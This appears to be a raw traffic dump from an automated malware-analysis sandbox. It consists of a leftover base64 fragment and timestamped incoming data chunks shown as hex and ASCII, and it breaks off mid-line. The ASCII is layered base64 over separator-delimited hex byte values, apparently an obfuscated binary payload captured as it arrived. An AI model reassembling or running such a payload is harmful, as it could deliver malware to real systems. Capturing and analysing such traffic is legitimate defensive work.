MSxgRjEsYDg3LGBGRixgRDQsYDZGLGBGRSxgNDcsYDY0LGAwNyxgN0YsYDEyLGA3MixgNDcsYEM3LGBGRixgRDYsYDdGLGBGOCxgOTMsYEU5LGBGRixgNzgsYEY3LGBGRixgRkEsYDU3LGA3QyxgQTQsYEZGLGBCNCxgNUYsYDlBLGBDOCxgNkMsYEZFLGBGNixgQkYsYEY3LGA2RixgRkYsYDdCLGA2RixgRkQsYERBLGA1MCxgNDEsYEJGLGA
2021-12-02 17:26:37 UTC	168	IN	Data Raw: 6a 49 73 59 44 64 47 4c 47 42 46 52 69 78 67 52 45 59 73 59 45 59 79 4c 47 41 77 52 69 78 67 4f 44 45 73 59 44 55 30 4c 47 42 47 52 53 78 67 4d 6a 45 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 51 6b 59 73 59 45 56 45 4c 47 41 79 4d 43 78 67 52 6a 41 73 59 44 45 77 4c 47 41 77 4f 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 34 4e 43 78 67 51 7a 41 73 59 44 56 47 4c 47 42 47 4d 43 78 67 4f 45 49 73 59 45 4a 47 4c 47 42 47 4f 43 78 67 4e 45 51 73 59 44 67 77 4c 47 42 44 4d 43 78 67 4f 55 59 73 59 45 59 77 4c 47 42 46 4d 79 78 67 51 7a 6b 73 59 44 64 47 4c 47 42 45 4f 53 78 67 4e 44 45 73 59 45 55 77 4c 47 41 77 52 69 78 67 4f 45 51 73 59 44 49 77 4c 47 42 47 4d 43 78 67 4f 45 59 73 59 45 4d 33 4c 47 41 78 4d 53 78 67 52 6a 67 73 59 44 5a 47 4c 47 41 35 4d 43 78 67 Data Ascii: jIsYDdGLGBFRixgREYsYEYyLGAwRixgODEsYDU0LGBGRSxgMjEsYDNGLGA1NSxgQkYsYEVELGAyMCxgRjAsYDEwLGAwOCxgRkMsYEU2LGA4NCxgQzAsYDVGLGBGMCxgOEIsYEJGLGBGOCxgNEQsYDgwLGBDMCxgOUYsYEYwLGBFMyxgQzksYDdGLGBEOSxgNDEsYEUwLGAwRixgOEQsYDIwLGBGMCxgOEYsYEM3LGAxMSxgRjgsYDZGLGA5MCxg
2021-12-02 17:26:37 UTC	172	IN	Data Raw: 46 42 4c 47 42 42 4e 53 78 67 52 44 55 73 59 45 56 46 4c 47 42 47 52 69 78 67 4e 6a 41 73 59 44 67 30 4c 47 42 46 4f 53 78 67 4e 7a 63 73 59 44 63 35 4c 47 41 79 51 79 78 67 52 6b 51 73 59 45 5a 46 4c 47 41 7a 51 53 78 67 52 54 6b 73 59 45 49 7a 4c 47 41 7a 52 69 78 67 52 54 4d 73 59 44 4d 33 4c 47 42 47 4d 79 78 67 4d 54 59 73 59 45 4a 43 4c 47 41 77 52 53 78 67 4e 30 55 73 59 44 6b 7a 4c 47 42 47 52 69 78 67 4d 44 45 73 59 44 52 44 4c 47 41 33 4e 43 78 67 52 6a 51 73 59 44 4a 43 4c 47 41 34 52 53 78 67 4d 55 45 73 59 45 56 47 4c 47 42 44 4d 79 78 67 4e 55 59 73 59 44 51 31 4c 47 41 32 4f 53 78 67 4d 6a 4d 73 59 44 4d 79 4c 47 41 35 4e 43 78 67 51 6b 59 73 59 44 41 78 4c 47 41 78 4d 53 78 67 52 55 51 73 59 45 49 33 4c 47 41 30 4f 53 78 67 4d 55 59 73 59 Data Ascii: FBLGBBNSxgRDUsYEVFLGBGRixgNjAsYDg0LGBFOSxgNzcsYDc5LGAyQyxgRkQsYEZFLGAzQSxgRTksYEIzLGAzRixgRTMsYDM3LGBGMyxgMTYsYEJCLGAwRSxgN0UsYDkzLGBGRixgMDEsYDRDLGA3NCxgRjQsYDJCLGA4RSxgMUEsYEVGLGBDMyxgNUYsYDQ1LGA2OSxgMjMsYDMyLGA5NCxgQkYsYDAxLGAxMSxgRUQsYEI3LGA0OSxgMUYsY
2021-12-02 17:26:37 UTC	176	IN	Data Raw: 43 4e 79 78 67 52 6b 45 73 59 44 4a 45 4c 47 41 33 52 53 78 67 51 55 51 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 46 46 4c 47 41 33 52 53 78 67 4f 44 45 73 59 45 4e 46 4c 47 42 47 4f 53 78 67 4e 6b 59 73 59 44 52 46 4c 47 41 79 4d 79 78 67 52 6b 59 73 59 44 6b 35 4c 47 41 35 52 69 78 67 51 55 45 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 51 30 55 73 59 45 4d 34 4c 47 42 47 52 69 78 67 52 54 55 73 59 45 5a 47 4c 47 41 77 51 53 78 67 4d 45 4d 73 59 44 4d 31 4c 47 41 33 52 43 78 67 52 6a 59 73 59 45 5a 45 4c 47 41 79 52 69 78 67 4d 30 4d 73 59 44 67 32 4c 47 42 47 51 53 78 67 52 6b 49 73 59 45 55 34 4c 47 42 44 4d 79 78 67 52 45 59 73 59 45 5a 44 4c 47 42 43 4e 79 78 67 4d 6a 63 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6a 55 73 59 44 6c 47 4c 47 Data Ascii: CNyxgRkEsYDJELGA3RSxgQUQsYERGLGBFMixgRDcsYEFFLGA3RSxgODEsYENFLGBGOSxgNkYsYDRFLGAyMyxgRkYsYDk5LGA5RixgQUEsYEZGLGBGOSxgQ0UsYEM4LGBGRixgRTUsYEZGLGAwQSxgMEMsYDM1LGA3RCxgRjYsYEZELGAyRixgM0MsYDg2LGBGQSxgRkIsYEU4LGBDMyxgREYsYEZDLGBCNyxgMjcsYEZDLGBGRixgRjUsYDlGLG
2021-12-02 17:26:37 UTC	180	IN	Data Raw: 4e 45 49 73 59 44 64 47 4c 47 41 7a 4d 79 78 67 52 44 67 73 59 44 68 43 4c 47 41 31 52 69 78 67 52 55 59 73 59 45 49 33 4c 47 42 45 4f 53 78 67 52 6b 45 73 59 45 46 45 4c 47 42 42 4f 43 78 67 51 7a 63 73 59 44 46 47 4c 47 42 47 51 69 78 67 51 30 51 73 59 44 64 47 4c 47 41 7a 52 43 78 67 51 30 45 73 59 44 5a 42 4c 47 41 35 51 79 78 67 4f 44 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 4f 55 51 73 59 45 59 30 4c 47 42 47 4d 69 78 67 4e 6b 59 73 59 44 51 77 4c 47 42 42 52 53 78 67 51 7a 6b 73 59 45 59 33 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 45 31 4c 47 41 33 52 69 78 67 4d 44 51 73 59 45 51 30 4c 47 42 45 51 53 78 67 4d 30 59 73 59 45 59 30 4c 47 41 7a 52 69 78 67 52 6b 51 73 59 45 49 32 4c 47 41 78 52 53 78 67 4d 44 4d 73 59 45 5a 46 4c 47 42 46 52 53 78 Data Ascii: NEIsYDdGLGAzMyxgRDgsYDhCLGA1RixgRUYsYEI3LGBEOSxgRkEsYEFELGBBOCxgQzcsYDFGLGBGQixgQ0QsYDdGLGAzRCxgQ0EsYDZBLGA5QyxgODUsYDJGLGBGRixgOUQsYEY0LGBGMixgNkYsYDQwLGBBRSxgQzksYEY3LGA1RixgRkYsYEE1LGA3RixgMDQsYEQ0LGBEQSxgM0YsYEY0LGAzRixgRkQsYEI2LGAxRSxgMDMsYEZFLGBFRSx
2021-12-02 17:26:37 UTC	185	IN	Data Raw: 45 46 47 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 4e 47 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 52 54 55 73 59 44 6c 46 4c 47 42 47 4e 79 78 67 52 6a 41 73 59 44 6c 43 4c 47 41 77 4d 79 78 67 52 54 59 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 51 54 63 73 59 45 5a 44 4c 47 41 31 4f 53 78 67 4e 30 59 73 59 44 51 79 4c 47 42 43 51 53 78 67 52 6a 67 73 59 45 4e 47 4c 47 42 47 52 53 78 67 52 6a 63 73 59 44 56 47 4c 47 42 46 4f 53 78 67 51 7a 4d 73 59 45 5a 44 4c 47 41 30 52 43 78 67 4d 44 45 73 59 45 59 7a 4c 47 41 7a 4e 79 78 67 4d 6a 55 73 59 44 4e 45 4c 47 42 47 4e 43 78 67 4e 30 49 73 59 44 67 31 4c 47 41 7a 4d 43 78 67 52 6b 59 73 59 44 51 7a 4c 47 41 34 4f 43 78 67 52 54 4d 73 59 45 4a 47 4c 47 42 47 52 43 78 67 52 6a 67 73 Data Ascii: EFGLGA5QixgRkUsYENGLGA3RixgRjUsYDJGLGBGRixgRTUsYDlFLGBGNyxgRjAsYDlCLGAwMyxgRTYsYEZGLGBGNCxgQTcsYEZDLGA1OSxgN0YsYDQyLGBCQSxgRjgsYENGLGBGRSxgRjcsYDVGLGBFOSxgQzMsYEZDLGA0RCxgMDEsYEYzLGAzNyxgMjUsYDNELGBGNCxgN0IsYDg1LGAzMCxgRkYsYDQzLGA4OCxgRTMsYEJGLGBGRCxgRjgs
2021-12-02 17:26:37 UTC	189	IN	Data Raw: 41 33 4f 53 78 67 52 6b 45 73 59 45 56 47 4c 47 41 7a 52 69 78 67 52 6b 59 73 59 44 59 31 4c 47 41 33 52 69 78 67 52 6b 55 73 59 45 59 35 4c 47 42 46 52 69 78 67 52 6b 51 73 59 44 64 43 4c 47 41 32 4e 79 78 67 52 54 63 73 59 45 55 35 4c 47 42 47 4e 79 78 67 52 6b 55 73 59 45 4d 78 4c 47 42 43 52 69 78 67 52 55 4d 73 59 44 64 47 4c 47 41 79 4d 53 78 67 4d 44 4d 73 59 45 59 34 4c 47 42 47 4d 69 78 67 51 6b 59 73 59 45 5a 47 4c 47 41 77 4d 79 78 67 51 7a 59 73 59 45 55 30 4c 47 41 31 52 53 78 67 52 6b 55 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4e 54 4d 73 59 44 67 30 4c 47 41 79 4e 79 78 67 4e 30 55 73 59 44 4e 45 4c 47 41 35 51 53 78 67 52 6b 49 73 59 45 4a 47 4c 47 41 30 4d 69 78 67 4e 7a 6b 73 59 44 41 77 4c 47 42 46 4d 53 78 67 51 7a 41 73 59 44 52 47 4c Data Ascii: A3OSxgRkEsYEVGLGAzRixgRkYsYDY1LGA3RixgRkUsYEY5LGBFRixgRkQsYDdCLGA2NyxgRTcsYEU5LGBGNyxgRkUsYEMxLGBCRixgRUMsYDdGLGAyMSxgMDMsYEY4LGBGMixgQkYsYEZGLGAwMyxgQzYsYEU0LGA1RSxgRkUsYEJBLGBCRixgNTMsYDg0LGAyNyxgN0UsYDNELGA5QSxgRkIsYEJGLGA0MixgNzksYDAwLGBFMSxgQzAsYDRGL
2021-12-02 17:26:37 UTC	192	IN	Data Raw: 32 4c 47 41 31 52 69 78 67 4e 45 4d 73 59 44 42 44 4c 47 42 47 4e 79 78 67 4e 55 59 73 59 45 51 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 51 34 4c 47 41 31 4d 69 78 67 4d 30 55 73 59 44 59 77 4c 47 42 43 52 53 78 67 4f 54 51 73 59 44 59 7a 4c 47 42 46 51 79 78 67 52 45 59 73 59 45 59 30 4c 47 42 45 4e 79 78 67 52 44 67 73 59 45 5a 46 4c 47 41 34 52 43 78 67 51 7a 6b 73 59 44 63 33 4c 47 41 79 4e 79 78 67 52 55 55 73 59 45 5a 47 4c 47 41 77 4e 53 78 67 4e 30 59 73 59 45 5a 44 4c 47 42 42 52 69 78 67 4f 44 4d 73 59 44 52 47 4c 47 41 33 52 53 78 67 51 6b 51 73 59 45 59 30 4c 47 42 42 51 69 78 67 4d 30 59 73 59 45 59 31 4c 47 42 44 52 69 78 67 4e 30 51 73 59 45 59 34 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 41 32 4c 47 42 43 52 69 78 67 52 6a 6b 73 59 44 Data Ascii: 2LGA1RixgNEMsYDBDLGBGNyxgNUYsYEQwLGBGRixgRkYsYDQ4LGA1MixgM0UsYDYwLGBCRSxgOTQsYDYzLGBFQyxgREYsYEY0LGBENyxgRDgsYEZFLGA4RCxgQzksYDc3LGAyNyxgRUUsYEZGLGAwNSxgN0YsYEZDLGBBRixgODMsYDRGLGA3RSxgQkQsYEY0LGBBQixgM0YsYEY1LGBDRixgN0QsYEY4LGA1QixgRkUsYDA2LGBCRixgRjksYD
2021-12-02 17:26:37 UTC	196	IN	Data Raw: 4d 69 78 67 4e 6a 63 73 59 45 55 35 4c 47 42 43 52 69 78 67 51 6a 55 73 59 45 5a 44 4c 47 41 35 52 69 78 67 52 6b 59 73 59 44 59 7a 4c 47 42 47 52 69 78 67 51 30 51 73 59 44 64 45 4c 47 41 79 4d 43 78 67 51 6a 6b 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 44 45 33 4c 47 41 35 52 43 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 78 4e 69 78 67 51 6b 4d 73 59 45 59 78 4c 47 41 79 52 69 78 67 52 6b 51 73 59 44 5a 45 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 44 46 47 4c 47 41 35 52 69 78 67 52 6b 55 73 59 45 4d 32 4c 47 42 47 52 69 78 67 4e 7a 6b 73 59 44 45 31 4c 47 41 30 51 79 78 67 51 7a 49 73 59 44 5a 47 4c 47 42 47 51 69 78 67 4f 55 49 73 59 45 5a 47 4c 47 42 43 51 53 78 67 4e 6b 55 73 59 44 45 79 4c 47 41 33 52 53 78 67 52 45 49 73 59 44 6c 47 4c 47 42 Data Ascii: MixgNjcsYEU5LGBCRixgQjUsYEZDLGA5RixgRkYsYDYzLGBGRixgQ0QsYDdELGAyMCxgQjksYEZGLGA1MyxgRjUsYDE3LGA5RCxgMzcsYEZFLGAxNixgQkMsYEYxLGAyRixgRkQsYDZELGA3RixgRjksYDFGLGA5RixgRkUsYEM2LGBGRixgNzksYDE1LGA0QyxgQzIsYDZGLGBGQixgOUIsYEZGLGBCQSxgNkUsYDEyLGA3RSxgREIsYDlGLGB
2021-12-02 17:26:37 UTC	200	IN	Data Raw: 55 45 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 51 30 55 73 59 44 68 43 4c 47 41 7a 4f 53 78 67 4e 55 55 73 59 44 4e 44 4c 47 42 47 52 53 78 67 4e 44 4d 73 59 44 64 46 4c 47 42 45 4d 79 78 67 4e 30 49 73 59 45 55 35 4c 47 41 32 52 69 78 67 52 6a 63 73 59 45 55 77 4c 47 41 32 4e 79 78 67 52 6b 55 73 59 44 64 43 4c 47 42 47 52 69 78 67 51 7a 55 73 59 44 56 47 4c 47 42 47 4f 43 78 67 4e 6a 4d 73 59 44 68 46 4c 47 41 79 51 79 78 67 51 6b 59 73 59 45 59 77 4c 47 42 42 4e 79 78 67 52 55 45 73 59 45 4a 47 4c 47 42 43 4d 43 78 67 52 6a 4d 73 59 45 55 79 4c 47 41 77 4f 43 78 67 4d 6b 59 73 59 45 5a 46 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 52 43 4c 47 41 35 4d 79 78 67 4d 30 59 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4d 54 4d 73 59 44 64 46 4c 47 42 45 4e 79 78 67 Data Ascii: UEsYEZGLGBFOCxgQ0UsYDhCLGAzOSxgNUUsYDNDLGBGRSxgNDMsYDdFLGBEMyxgN0IsYEU5LGA2RixgRjcsYEUwLGA2NyxgRkUsYDdCLGBGRixgQzUsYDVGLGBGOCxgNjMsYDhFLGAyQyxgQkYsYEYwLGBBNyxgRUEsYEJGLGBCMCxgRjMsYEUyLGAwOCxgMkYsYEZFLGBENSxgN0YsYERCLGA5MyxgM0YsYDNGLGBGRCxgMTMsYDdFLGBENyxg
2021-12-02 17:26:37 UTC	204	IN	Data Raw: 52 42 4c 47 42 47 52 43 78 67 4e 6b 45 73 59 45 5a 42 4c 47 42 47 52 43 78 67 4f 54 41 73 59 44 64 46 4c 47 42 47 52 69 78 67 4e 6b 49 73 59 44 41 34 4c 47 42 45 52 69 78 67 4e 30 59 73 59 44 6b 78 4c 47 42 46 4d 43 78 67 52 6b 59 73 59 44 46 42 4c 47 42 43 52 69 78 67 4d 54 6b 73 59 44 49 31 4c 47 41 34 52 43 78 67 4d 44 67 73 59 45 4e 46 4c 47 41 78 52 69 78 67 4e 45 55 73 59 44 6c 47 4c 47 42 47 52 69 78 67 4e 7a 45 73 59 45 51 30 4c 47 42 47 52 53 78 67 52 45 59 73 59 44 41 31 4c 47 41 79 52 53 78 67 4f 44 51 73 59 45 4d 7a 4c 47 41 31 52 69 78 67 4e 44 51 73 59 44 4e 47 4c 47 41 31 4e 79 78 67 52 44 51 73 59 45 55 32 4c 47 42 42 52 69 78 67 51 54 55 73 59 44 4e 46 4c 47 42 47 52 69 78 67 4d 30 51 73 59 45 4d 79 4c 47 42 47 52 69 78 67 4f 54 63 73 59 Data Ascii: RBLGBGRCxgNkEsYEZBLGBGRCxgOTAsYDdFLGBGRixgNkIsYDA4LGBERixgN0YsYDkxLGBFMCxgRkYsYDFBLGBCRixgMTksYDI1LGA4RCxgMDgsYENFLGAxRixgNEUsYDlGLGBGRixgNzEsYEQ0LGBGRSxgREYsYDA1LGAyRSxgODQsYEMzLGA1RixgNDQsYDNGLGA1NyxgRDQsYEU2LGBBRixgQTUsYDNFLGBGRixgM0QsYEMyLGBGRixgOTcsY
2021-12-02 17:26:37 UTC	208	IN	Data Raw: 35 4d 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 42 42 52 69 78 67 4e 30 55 73 59 45 46 42 4c 47 42 47 52 53 78 67 51 55 49 73 59 44 4e 43 4c 47 42 42 52 69 78 67 52 6b 55 73 59 45 45 78 4c 47 41 33 4f 43 78 67 52 6a 55 73 59 45 51 35 4c 47 41 32 52 69 78 67 4e 7a 59 73 59 44 55 77 4c 47 42 42 4e 43 78 67 51 6b 59 73 59 44 52 43 4c 47 42 47 52 53 78 67 52 6a 45 73 59 45 45 31 4c 47 42 47 52 69 78 67 52 55 45 73 59 44 68 47 4c 47 42 47 52 69 78 67 52 54 59 73 59 45 4a 47 4c 47 42 44 4d 53 78 67 52 55 59 73 59 44 6b 79 4c 47 42 42 4f 43 78 67 52 54 45 73 59 44 52 46 4c 47 42 46 4d 43 78 67 4d 54 51 73 59 45 5a 45 4c 47 41 34 4d 79 78 67 4f 55 51 73 59 44 55 33 4c 47 42 43 52 69 78 67 4f 45 51 73 59 44 55 33 4c 47 42 47 52 69 78 67 52 44 67 73 59 44 4e 47 4c 47 Data Ascii: 5MCxgRkMsYEU2LGBBRixgN0UsYEFBLGBGRSxgQUIsYDNCLGBBRixgRkUsYEExLGA3OCxgRjUsYEQ5LGA2RixgNzYsYDUwLGBBNCxgQkYsYDRCLGBGRSxgRjEsYEE1LGBGRixgRUEsYDhGLGBGRixgRTYsYEJGLGBDMSxgRUYsYDkyLGBBOCxgRTEsYDRFLGBFMCxgMTQsYEZELGA4MyxgOUQsYDU3LGBCRixgOEQsYDU3LGBGRixgRDgsYDNGLG
2021-12-02 17:26:37 UTC	212	IN	Data Raw: 4e 55 51 73 59 44 64 46 4c 47 41 77 51 69 78 67 4f 45 51 73 59 44 59 30 4c 47 41 35 4d 79 78 67 52 45 59 73 59 45 5a 44 4c 47 42 46 4d 43 78 67 51 54 63 73 59 45 56 42 4c 47 41 33 52 69 78 67 51 6a 55 73 59 45 59 7a 4c 47 42 46 51 53 78 67 4d 30 59 73 59 44 68 43 4c 47 41 32 4d 43 78 67 52 54 51 73 59 45 59 7a 4c 47 41 30 4e 79 78 67 52 6b 59 73 59 45 59 35 4c 47 41 35 52 69 78 67 4f 54 59 73 59 44 46 46 4c 47 41 7a 52 53 78 67 52 6b 45 73 59 45 52 43 4c 47 41 77 4d 79 78 67 4d 45 49 73 59 45 59 31 4c 47 42 45 51 69 78 67 4f 54 41 73 59 45 4a 44 4c 47 41 7a 4f 53 78 67 51 6b 51 73 59 44 52 45 4c 47 41 78 4f 53 78 67 51 55 59 73 59 45 5a 47 4c 47 42 43 4e 69 78 67 52 6a 4d 73 59 45 56 42 4c 47 41 35 52 69 78 67 4f 44 51 73 59 44 55 33 4c 47 42 42 4e 79 78 Data Ascii: NUQsYDdFLGAwQixgOEQsYDY0LGA5MyxgREYsYEZDLGBFMCxgQTcsYEVBLGA3RixgQjUsYEYzLGBFQSxgM0YsYDhCLGA2MCxgRTQsYEYzLGA0NyxgRkYsYEY5LGA5RixgOTYsYDFFLGAzRSxgRkEsYERCLGAwMyxgMEIsYEY1LGBEQixgOTAsYEJDLGAzOSxgQkQsYDRELGAxOSxgQUYsYEZGLGBCNixgRjMsYEVBLGA5RixgODQsYDU3LGBBNyx
2021-12-02 17:26:37 UTC	224	IN	Data Raw: 7a 4c 47 41 78 51 69 78 67 52 6b 51 73 59 44 46 42 4c 47 41 79 4e 43 78 67 4e 6a 59 73 59 45 4a 47 4c 47 42 44 4e 69 78 67 4e 6b 59 73 59 45 4d 34 4c 47 42 43 51 79 78 67 52 6b 55 73 59 44 56 47 4c 47 42 47 52 43 78 67 52 44 49 73 59 44 6c 47 4c 47 42 47 52 53 78 67 52 45 55 73 59 44 5a 47 4c 47 42 47 4e 43 78 67 4d 55 49 73 59 45 55 30 4c 47 42 46 4e 79 78 67 52 54 6b 73 59 44 68 47 4c 47 42 47 52 69 78 67 52 54 55 73 59 44 56 47 4c 47 42 47 52 43 78 67 4e 55 59 73 59 45 55 35 4c 47 42 46 52 69 78 67 52 6a 55 73 59 44 55 7a 4c 47 42 43 52 69 78 67 52 6a 4d 73 59 44 59 78 4c 47 42 47 51 53 78 67 4e 30 49 73 59 45 5a 44 4c 47 41 79 52 43 78 67 4e 30 59 73 59 45 59 30 4c 47 41 7a 52 69 78 67 52 6a 59 73 59 44 55 7a 4c 47 41 7a 52 69 78 67 4f 54 55 73 59 45 Data Ascii: zLGAxQixgRkQsYDFBLGAyNCxgNjYsYEJGLGBDNixgNkYsYEM4LGBCQyxgRkUsYDVGLGBGRCxgRDIsYDlGLGBGRSxgREUsYDZGLGBGNCxgMUIsYEU0LGBFNyxgRTksYDhGLGBGRixgRTUsYDVGLGBGRCxgNUYsYEU5LGBFRixgRjUsYDUzLGBCRixgRjMsYDYxLGBGQSxgN0IsYEZDLGAyRCxgN0YsYEY0LGAzRixgRjYsYDUzLGAzRixgOTUsYE
2021-12-02 17:26:37 UTC	228	IN	Data Raw: 51 30 4d 73 59 44 64 47 4c 47 41 32 52 69 78 67 4f 45 49 73 59 45 59 79 4c 47 41 77 4e 79 78 67 52 6b 59 73 59 45 55 30 4c 47 41 30 52 69 78 67 4e 7a 45 73 59 44 64 47 4c 47 41 78 4e 43 78 67 4e 44 63 73 59 45 5a 45 4c 47 42 43 4d 79 78 67 4f 55 51 73 59 45 59 33 4c 47 42 47 52 53 78 67 4d 6b 45 73 59 45 4a 44 4c 47 42 47 4e 79 78 67 52 45 59 73 59 45 5a 45 4c 47 41 35 52 43 78 67 51 6b 59 73 59 45 59 30 4c 47 41 78 52 69 78 67 4e 44 6b 73 59 44 64 47 4c 47 42 46 4d 79 78 67 51 7a 6b 73 59 45 4a 47 4c 47 42 46 4d 69 78 67 4e 7a 4d 73 59 45 55 34 4c 47 41 32 52 69 78 67 4f 54 6b 73 59 44 55 77 4c 47 41 31 4e 69 78 67 4f 55 51 73 59 44 63 7a 4c 47 41 78 52 43 78 67 51 6a 51 73 59 44 59 34 4c 47 42 47 4d 53 78 67 4e 54 4d 73 59 45 59 31 4c 47 41 33 52 69 78 Data Ascii: Q0MsYDdGLGA2RixgOEIsYEYyLGAwNyxgRkYsYEU0LGA0RixgNzEsYDdGLGAxNCxgNDcsYEZELGBCMyxgOUQsYEY3LGBGRSxgMkEsYEJDLGBGNyxgREYsYEZELGA5RCxgQkYsYEY0LGAxRixgNDksYDdGLGBFMyxgQzksYEJGLGBFMixgNzMsYEU4LGA2RixgOTksYDUwLGA1NixgOUQsYDczLGAxRCxgQjQsYDY4LGBGMSxgNTMsYEY1LGA3Rix
2021-12-02 17:26:37 UTC	244	IN	Data Raw: 4f 54 63 73 59 44 56 47 4c 47 42 42 4e 79 78 67 4d 6a 63 73 59 45 5a 47 4c 47 42 45 4f 53 78 67 52 6b 59 73 59 45 59 78 4c 47 41 7a 4e 79 78 67 52 6b 49 73 59 44 59 77 4c 47 42 43 52 53 78 67 52 6a 55 73 59 44 52 43 4c 47 42 47 52 69 78 67 4e 44 63 73 59 44 55 35 4c 47 41 33 51 53 78 67 52 6b 51 73 59 44 64 43 4c 47 41 32 4f 43 78 67 52 44 67 73 59 45 4e 44 4c 47 41 30 4e 69 78 67 51 6b 59 73 59 44 49 31 4c 47 41 35 4d 43 78 67 51 54 63 73 59 45 49 77 4c 47 42 46 4e 43 78 67 4e 6b 59 73 59 45 56 47 4c 47 41 77 4d 43 78 67 52 6b 55 73 59 44 59 33 4c 47 41 32 4d 43 78 67 4e 7a 4d 73 59 45 5a 47 4c 47 42 42 52 69 78 67 4e 45 59 73 59 45 5a 47 4c 47 41 34 52 43 78 67 52 55 59 73 59 45 45 32 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 44 6b 33 4c 47 41 33 52 69 78 Data Ascii: OTcsYDVGLGBBNyxgMjcsYEZGLGBEOSxgRkYsYEYxLGAzNyxgRkIsYDYwLGBCRSxgRjUsYDRCLGBGRixgNDcsYDU5LGA3QSxgRkQsYDdCLGA2OCxgRDgsYENDLGA0NixgQkYsYDI1LGA5MCxgQTcsYEIwLGBFNCxgNkYsYEVGLGAwMCxgRkUsYDY3LGA2MCxgNzMsYEZGLGBBRixgNEYsYEZGLGA4RCxgRUYsYEE2LGA3RixgRjksYDk3LGA3Rix
2021-12-02 17:26:37 UTC	256	IN	Data Raw: 77 4c 47 42 45 52 69 78 67 4f 45 59 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4d 30 45 73 59 44 41 77 4c 47 42 47 52 53 78 67 4e 54 6b 73 59 44 42 42 4c 47 41 34 4e 79 78 67 4e 30 59 73 59 45 59 7a 4c 47 42 45 52 69 78 67 4f 44 6b 73 59 45 45 34 4c 47 42 47 52 43 78 67 4e 6a 63 73 59 44 64 47 4c 47 42 47 52 69 78 67 4e 30 59 73 59 45 5a 46 4c 47 41 35 4e 79 78 67 4e 44 45 73 59 45 56 45 4c 47 41 7a 4e 79 78 67 52 54 63 73 59 45 4a 47 4c 47 42 42 52 69 78 67 4f 54 63 73 59 44 4d 31 4c 47 41 32 4d 69 78 67 4e 6b 45 73 59 44 64 47 4c 47 41 33 4f 53 78 67 52 45 55 73 59 45 45 33 4c 47 42 47 4e 69 78 67 4f 55 59 73 59 44 64 44 4c 47 41 78 52 53 78 67 51 54 55 73 59 45 59 32 4c 47 42 44 52 69 78 67 4e 6a 41 73 59 45 55 78 4c 47 42 46 52 53 78 67 52 55 55 73 59 44 Data Ascii: wLGBERixgOEYsYDU2LGBFOCxgM0EsYDAwLGBGRSxgNTksYDBBLGA4NyxgN0YsYEYzLGBERixgODksYEE4LGBGRCxgNjcsYDdGLGBGRixgN0YsYEZFLGA5NyxgNDEsYEVELGAzNyxgRTcsYEJGLGBBRixgOTcsYDM1LGA2MixgNkEsYDdGLGA3OSxgREUsYEE3LGBGNixgOUYsYDdDLGAxRSxgQTUsYEY2LGBDRixgNjAsYEUxLGBFRSxgRUUsYD
2021-12-02 17:26:37 UTC	272	IN	Data Raw: 47 4c 47 42 43 4f 53 78 67 52 44 45 73 59 45 59 78 4c 47 42 46 52 69 78 67 52 6a 67 73 59 44 63 33 4c 47 41 35 52 43 78 67 51 54 55 73 59 44 59 33 4c 47 42 43 52 69 78 67 4e 6a 45 73 59 45 59 78 4c 47 42 43 52 69 78 67 52 6a 67 73 59 45 56 47 4c 47 41 35 51 69 78 67 4e 55 4d 73 59 44 59 30 4c 47 41 33 4e 79 78 67 4f 45 51 73 59 45 4d 31 4c 47 42 46 4e 53 78 67 4d 6a 49 73 59 45 5a 43 4c 47 41 34 4d 69 78 67 4e 44 49 73 59 45 49 35 4c 47 42 44 4f 43 78 67 51 6b 59 73 59 45 49 34 4c 47 42 45 4d 79 78 67 51 7a 45 73 59 44 56 47 4c 47 41 34 51 69 78 67 4e 55 4d 73 59 45 55 30 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 44 5a 43 4c 47 42 43 52 43 78 67 4e 30 4d 73 59 44 6b 77 4c 47 42 47 52 53 78 67 51 54 59 73 59 44 64 47 4c 47 42 46 4d 53 78 67 51 6b 59 73 59 45 Data Ascii: GLGBCOSxgRDEsYEYxLGBFRixgRjgsYDc3LGA5RCxgQTUsYDY3LGBCRixgNjEsYEYxLGBCRixgRjgsYEVGLGA5QixgNUMsYDY0LGA3NyxgOEQsYEM1LGBFNSxgMjIsYEZCLGA4MixgNDIsYEI5LGBDOCxgQkYsYEI4LGBEMyxgQzEsYDVGLGA4QixgNUMsYEU0LGA3RixgRjksYDZCLGBCRCxgN0MsYDkwLGBGRSxgQTYsYDdGLGBFMSxgQkYsYE
2021-12-02 17:26:37 UTC	288	IN	Data Raw: 34 4c 47 42 47 4d 69 78 67 51 54 45 73 59 44 6b 34 4c 47 42 46 4e 53 78 67 51 6a 59 73 59 45 4e 47 4c 47 41 7a 51 53 78 67 4e 6b 59 73 59 44 4e 44 4c 47 42 44 4e 43 78 67 4d 55 49 73 59 45 4a 47 4c 47 42 46 4d 53 78 67 51 55 59 73 59 45 5a 44 4c 47 41 35 4e 53 78 67 4f 55 59 73 59 45 45 30 4c 47 42 47 52 69 78 67 52 55 55 73 59 45 4a 47 4c 47 41 33 52 43 78 67 4d 54 51 73 59 45 46 44 4c 47 41 7a 4e 53 78 67 4f 55 45 73 59 45 4a 44 4c 47 42 45 52 53 78 67 52 55 49 73 59 45 4e 46 4c 47 41 78 51 69 78 67 51 6b 59 73 59 44 4e 46 4c 47 42 45 52 53 78 67 52 6a 67 73 59 44 4e 45 4c 47 42 47 